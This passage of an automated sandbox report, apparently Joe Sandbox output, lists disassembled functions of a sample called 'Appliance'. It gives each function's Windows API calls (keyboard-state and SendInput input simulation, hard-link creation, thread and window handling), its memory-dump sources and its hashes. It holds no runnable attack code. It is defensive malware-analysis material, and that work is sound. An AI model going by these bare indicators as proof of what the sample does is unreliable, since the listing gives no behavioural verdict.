                                                                                                                                            • Instruction ID: 56cbdac565687cd0c7574ce30c4066920943e0efe7b3c176568f55510d045369
                                                                                                                                            • Opcode Fuzzy Hash: 8d0e312e6f7811eecaa61d5633a1486c00bfc9c64631dcc1b497c4f2e1be5c9c
                                                                                                                                            • Instruction Fuzzy Hash: AD41E371A00708BFD724AF78D841BBABBE8EB88760F11C52EE251DB291D771994187A0
                                                                                                                                            APIs
                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E361C8
                                                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 00E361EE
                                                                                                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E36213
                                                                                                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E3623F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3321077145-0
                                                                                                                                            • Opcode ID: cb37e49385cf1cd8819bd36090a788a5e25efd3c28ee77b2d80b8947a3c83706
                                                                                                                                            • Instruction ID: 4cbd2c1095a16398682a11ea4af5812126b8ec26b60b5724b44f0090ea806bf2
                                                                                                                                            • Opcode Fuzzy Hash: cb37e49385cf1cd8819bd36090a788a5e25efd3c28ee77b2d80b8947a3c83706
                                                                                                                                            • Instruction Fuzzy Hash: B8413A39600611DFCB21DF25C545A1ABBF6EF89714F198488E94AAB362CB31FC01DBA1
                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E2B473
                                                                                                                                            • SetKeyboardState.USER32(00000080), ref: 00E2B48F
                                                                                                                                            • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E2B4FD
                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E2B54F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                            • Opcode ID: fe5dd5b0c3cf4f84f0e5434badf73ddc21654f4959221124761087c3a4e1e203
                                                                                                                                            • Instruction ID: f3083922400aef3d5d5b116794693a059c04425439f9b1490d27911da2c099e9
                                                                                                                                            • Opcode Fuzzy Hash: fe5dd5b0c3cf4f84f0e5434badf73ddc21654f4959221124761087c3a4e1e203
                                                                                                                                            • Instruction Fuzzy Hash: 42318B70A40328AFFF34DB25AC447FA7BB6BB48315F08561AE0A2BA1D2D37489858751
                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00E2B5B8
                                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00E2B5D4
                                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00E2B63B
                                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00E2B68D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 432972143-0
                                                                                                                                            • Opcode ID: 0dce1903a33d5c80b446307c6be15673b172a72b47275ab9a4cb0a8443c1aee0
                                                                                                                                            • Instruction ID: 05afab261060cc16ffc3e4996879dce0e09948ec6d02a250a03bb8258c6f21ea
                                                                                                                                            • Opcode Fuzzy Hash: 0dce1903a33d5c80b446307c6be15673b172a72b47275ab9a4cb0a8443c1aee0
                                                                                                                                            • Instruction Fuzzy Hash: 8E313E309406289FFF348B65AC057FA7BB6BF85314F08922AE481B61D1C77489458B51
                                                                                                                                            APIs
                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 00E580D4
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00E5814A
                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 00E5815A
                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00E581C6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                            • Opcode ID: 61ed4533435ba313fdd90519444c4de94c8a2746a74fdde588cef8a214913492
                                                                                                                                            • Instruction ID: f29ebc1674c77cd456569c8f301325acf942dad8426f0d3f82bcef998ff5a146
                                                                                                                                            • Opcode Fuzzy Hash: 61ed4533435ba313fdd90519444c4de94c8a2746a74fdde588cef8a214913492
                                                                                                                                            • Instruction Fuzzy Hash: 8641AF30A02614EFCB15CF59CA80AA977F5FB45316F1458A9EE44BB261CB30A84ECF40
                                                                                                                                            APIs
                                                                                                                                            • GetForegroundWindow.USER32 ref: 00E52187
                                                                                                                                              • Part of subcall function 00E24393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E243AD
                                                                                                                                              • Part of subcall function 00E24393: GetCurrentThreadId.KERNEL32 ref: 00E243B4
                                                                                                                                              • Part of subcall function 00E24393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E22F00), ref: 00E243BB
                                                                                                                                            • GetCaretPos.USER32(?), ref: 00E5219B
                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00E521E8
                                                                                                                                            • GetForegroundWindow.USER32 ref: 00E521EE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                            • Opcode ID: 0c1100e210185b21a1da5ef2c021b7cef669de596a896a129fc4f7d5ccb9ae63
                                                                                                                                            • Instruction ID: 04feebedf765e439d8053516f5c4bdd110e008aef60ac41b4db047718a14fbf3
                                                                                                                                            • Opcode Fuzzy Hash: 0c1100e210185b21a1da5ef2c021b7cef669de596a896a129fc4f7d5ccb9ae63
                                                                                                                                            • Instruction Fuzzy Hash: 1C3170B1D01209AFC704DFAAC981DAEBBFCEF48304B50846EE515E7251DB71AE45CBA0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2E8E2
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2E8F9
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2E924
                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00E2E92F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                            • Opcode ID: 10bee797bf23bbd7f5781f8e3e54c3f2ef015a825bae5dd59eb42c09662397a4
                                                                                                                                            • Instruction ID: 5465bf74584ba16a1a393231df746a359f11d06190421040be1fa5c8fb3b37d8
                                                                                                                                            • Opcode Fuzzy Hash: 10bee797bf23bbd7f5781f8e3e54c3f2ef015a825bae5dd59eb42c09662397a4
                                                                                                                                            • Instruction Fuzzy Hash: AC21B571900324EFCB10AFA5D982BAEB7F8EF55750F144065E844BB341D6709E41C7B1
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00E5DC30), ref: 00E2DBA6
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E2DBB5
                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E2DBC4
                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00E5DC30), ref: 00E2DC21
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                            • Opcode ID: 875235fc699f646293b5b14a0e44ee0fb0d3f499f66b082936c0f2c1597b1637
                                                                                                                                            • Instruction ID: 9c81686d64331fd72b15c75d6b346a0c1753eb43cfa0795218bbb286bfaf89f7
                                                                                                                                            • Opcode Fuzzy Hash: 875235fc699f646293b5b14a0e44ee0fb0d3f499f66b082936c0f2c1597b1637
                                                                                                                                            • Instruction Fuzzy Hash: D721D33050C3158F8714DF28EC8199BB7E8EF55369F101A1DF499E32A1DB30D98ACB92
                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00E532A6
                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E532C0
                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E532CE
                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E532DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                            • Opcode ID: eb162cb81edd30b0ef565ee93c23344316cc69d7eac6dbaf841cb8257b060004
                                                                                                                                            • Instruction ID: c7bc1cb42674f761efbc9b2c8ce163108756bb55126d2e1c5f588573ab68fedb
                                                                                                                                            • Opcode Fuzzy Hash: eb162cb81edd30b0ef565ee93c23344316cc69d7eac6dbaf841cb8257b060004
                                                                                                                                            • Instruction Fuzzy Hash: 52213835208511AFD7159B24CC44F6ABB95FF41356F248A4CF8269B2E2C771ED45CBD0
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E296E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00E28271,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?), ref: 00E296F3
                                                                                                                                              • Part of subcall function 00E296E4: lstrcpyW.KERNEL32(00000000,?,?,00E28271,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E29719
                                                                                                                                              • Part of subcall function 00E296E4: lstrcmpiW.KERNEL32(00000000,?,00E28271,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?), ref: 00E2974A
                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E2828A
                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E282B0
                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00E290BB,00000000,?,0000001C,?,?,00000000), ref: 00E282EB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                            • String ID: cdecl
                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                            • Opcode ID: c851b6f4a1538474c939b5d3ea89eea95dab486c9c3ccdd7febd1c13f45f82c0
                                                                                                                                            • Instruction ID: 09f86d1589f9152ae43c11b2c0764c126e6fbe04b335dbcb9644691cbf450378
                                                                                                                                            • Opcode Fuzzy Hash: c851b6f4a1538474c939b5d3ea89eea95dab486c9c3ccdd7febd1c13f45f82c0
                                                                                                                                            • Instruction Fuzzy Hash: 5311263A201351AFCB14AF39EC44E7A77E9FF49754B10602AF946DB260EF719841C7A0
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 00E5615A
                                                                                                                                            • _wcslen.LIBCMT ref: 00E5616C
                                                                                                                                            • _wcslen.LIBCMT ref: 00E56177
                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E562B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                            • Opcode ID: f407727d32b985b586c8b64e72aaf94ea9b95345cae318b1da3abd01a7413404
                                                                                                                                            • Instruction ID: 20e8b76b2fc3c88f276fac3d78a16159107c5391a72ea517f5e88290f2735b32
                                                                                                                                            • Opcode Fuzzy Hash: f407727d32b985b586c8b64e72aaf94ea9b95345cae318b1da3abd01a7413404
                                                                                                                                            • Instruction Fuzzy Hash: FC11B435600608AADF20DF668D84AEE77BCEB15355F50592AFE15F6082E770C949CB70
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 67c4b44d9e1a69c764d3f192bfbba143fb87379978dea50b15eb3186b6cdb428
                                                                                                                                            • Instruction ID: a1938cba0c2cabd0f957c88c855de674b4ff44dac2f1a3760287431922f365e4
                                                                                                                                            • Opcode Fuzzy Hash: 67c4b44d9e1a69c764d3f192bfbba143fb87379978dea50b15eb3186b6cdb428
                                                                                                                                            • Instruction Fuzzy Hash: C801A2B320A61E7EF62126786CC0FB7670DDF413B8B3A8725B721A11D1DE618D8491B0
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00E22394
                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E223A6
                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E223BC
                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E223D7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                            • Opcode ID: 037ca3d35fab313179b7769e5478b2a37146189a54ed669945780ecdf746019c
                                                                                                                                            • Instruction ID: 424b0438bde8749a0b7c665919562001fc32c5f8f2cf703cc87e372340c352f0
                                                                                                                                            • Opcode Fuzzy Hash: 037ca3d35fab313179b7769e5478b2a37146189a54ed669945780ecdf746019c
                                                                                                                                            • Instruction Fuzzy Hash: D711093A900229FFEB11DBA5DD85F9DBBB8FF08754F201095EA01B7290D6716E10DB94
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00E2EB14
                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00E2EB47
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E2EB5D
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E2EB64
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                            • Opcode ID: e9d232c09e3a6d1bf7c4d487de6d79daa0d8f868107ec5b2ebdf2c4efdf44501
                                                                                                                                            • Instruction ID: f7de8b136c15c9beaefa01f057ecfd22e5090d8851f50d5e675d7485fe0da735
                                                                                                                                            • Opcode Fuzzy Hash: e9d232c09e3a6d1bf7c4d487de6d79daa0d8f868107ec5b2ebdf2c4efdf44501
                                                                                                                                            • Instruction Fuzzy Hash: 01112B76904329BFCB11EBA9AC05A9E7FADEB46315F10425BF915F3390D67489088760
                                                                                                                                            APIs
                                                                                                                                            • CreateThread.KERNEL32(00000000,?,00DED369,00000000,00000004,00000000), ref: 00DED588
                                                                                                                                            • GetLastError.KERNEL32 ref: 00DED594
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00DED59B
                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00DED5B9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                            • Opcode ID: 375cc718dcfad6ca6700f0056b0bb5aa33cd535c13702d1a0a87d2dad55f38c4
                                                                                                                                            • Instruction ID: 31a5c2e1645debe0131e3bffa4d852e59e567a142414d60306d29b51a0122e18
                                                                                                                                            • Opcode Fuzzy Hash: 375cc718dcfad6ca6700f0056b0bb5aa33cd535c13702d1a0a87d2dad55f38c4
                                                                                                                                            • Instruction Fuzzy Hash: 1E01F532405694BFCB207FA7DC09BAE7B6AEF82735F140219F925961E0DF708844C6B1
                                                                                                                                            APIs
                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DC78B1
                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00DC78C5
                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00DC78CF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
